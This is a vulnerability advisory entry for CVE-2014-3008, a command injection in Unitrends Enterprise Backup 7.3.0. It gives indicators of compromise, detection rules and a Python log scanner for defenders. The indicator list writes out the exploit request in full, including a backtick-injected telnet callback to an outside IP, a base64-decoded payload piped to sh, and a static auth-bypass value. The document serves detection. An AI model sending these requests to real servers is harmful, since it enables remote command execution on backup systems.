CVE-2014-3008
published 2014-04-28


Priority: P2
CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 6.96% (93.3rd percentile)
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.

Affected (1 range)

Vendor: unitrends
Product: enterprise_backup

Detection & IOCs (extracted from sources)

  • path: /recoveryconsole/bpl/snmpd.php
  • url: POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0
  • other: auth=1:/usr/bp/logs.dir/gui_root.log:100
  • path: /usr/bp/logs.dir/gui_root.log
  • command: notpublic`echo <base64_payload>|base64 --decode|sh`
  • Detect POST requests to /recoveryconsole/bpl/snmpd.php containing shell metacharacters (backticks, pipes, semicolons) in the 'comm' query parameter, indicating command injection attempts.
  • Alert on the static, predictable auth value '1:/usr/bp/logs.dir/gui_root.log:100' (URL-encoded: 1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100) appearing in POST body to any endpoint, as it indicates exploitation of the non-random auth bypass.
  • Flag requests where the 'comm' parameter value begins with 'notpublic' followed by backtick-enclosed commands, matching the exploit's injection pattern.
  • Monitor for outbound telnet connections initiated from the Unitrends server process, consistent with the proof-of-concept callback payload.
  • Inspect the Referer header for requests to snmpd.php; the exploit uses 'recoveryconsole/bpria/bin/bpria.swf' as referer, which may help correlate malicious sessions.
  • The Metasploit module defaults to SSL (port 443); network detection rules must account for HTTPS traffic and may require SSL inspection to detect the malicious POST body.
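The detection rules above can be turned into a small log-scanning check. The following Python is an added example, not code from cvebase or from the Unitrends project: it decodes the `comm` query parameter of POST requests to `/recoveryconsole/bpl/snmpd.php` and looks for shell metacharacters and the `notpublic`` prefix, and it flags the static `auth` value on any endpoint. The tab-separated log format and the three sample request lines are constructed for the example (the injected `id` command stands in for a real payload).

```python
"""Scan decoded HTTP request records for the CVE-2014-3008 injection pattern.

Added example: the detection logic follows the IoC bullets for this CVE, the
log format and sample lines are constructed and not from any real product.
"""
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/recoveryconsole/bpl/snmpd.php"
# Static, predictable auth value named in the IoC list; parse_qs URL-decodes
# it for us, so the comparison is against the decoded form.
STATIC_AUTH = "1:/usr/bp/logs.dir/gui_root.log:100"
# Shell metacharacters that never belong in a legitimate SNMP community string.
METACHARS = re.compile(r"[`|;&$(){}<>\n]")


def analyse_request(method, target, body=""):
    """Return the list of detection reasons for one request (empty means clean)."""
    reasons = []
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    body_params = parse_qs(body, keep_blank_values=True)

    # Rules 1 and 3: metacharacters / notpublic` prefix in 'comm' on POSTs to snmpd.php.
    if method.upper() == "POST" and parts.path == TARGET_PATH:
        for comm in query.get("comm", []) + body_params.get("comm", []):
            if METACHARS.search(comm):
                reasons.append("shell metacharacter in comm parameter")
            if comm.startswith("notpublic`"):
                reasons.append("comm matches notpublic` injection pattern")

    # Rule 2: the static auth value is suspicious on any endpoint, query or body.
    if STATIC_AUTH in body_params.get("auth", []) + query.get("auth", []):
        reasons.append("static auth value (auth bypass)")
    return reasons


# Constructed sample log: one request per line, "METHOD<TAB>TARGET<TAB>BODY".
SAMPLE_LOG = [
    "POST\t/recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=public&enabled=1"
    "\tauth=session-token-example",
    "POST\t/recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic%60id%60"
    "&enabled=1&ver=7.3.0\tauth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100",
    "POST\t/recoveryconsole/bpl/other.php"
    "\tauth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100&x=1",
]


def scan_log(lines):
    """Return [(line_number, reasons)] for every flagged request in the log."""
    hits = []
    for n, line in enumerate(lines, start=1):
        fields = line.split("\t", 2)
        method, target = fields[0], fields[1]
        body = fields[2] if len(fields) == 3 else ""
        reasons = analyse_request(method, target, body)
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```

Line 2 of the sample log trips all three rules; line 3 is a POST to a different endpoint and is flagged only for the static `auth` value. Because the exploit is normally delivered over HTTPS, this check has to run on decrypted traffic or on the application's own access logs rather than on the wire.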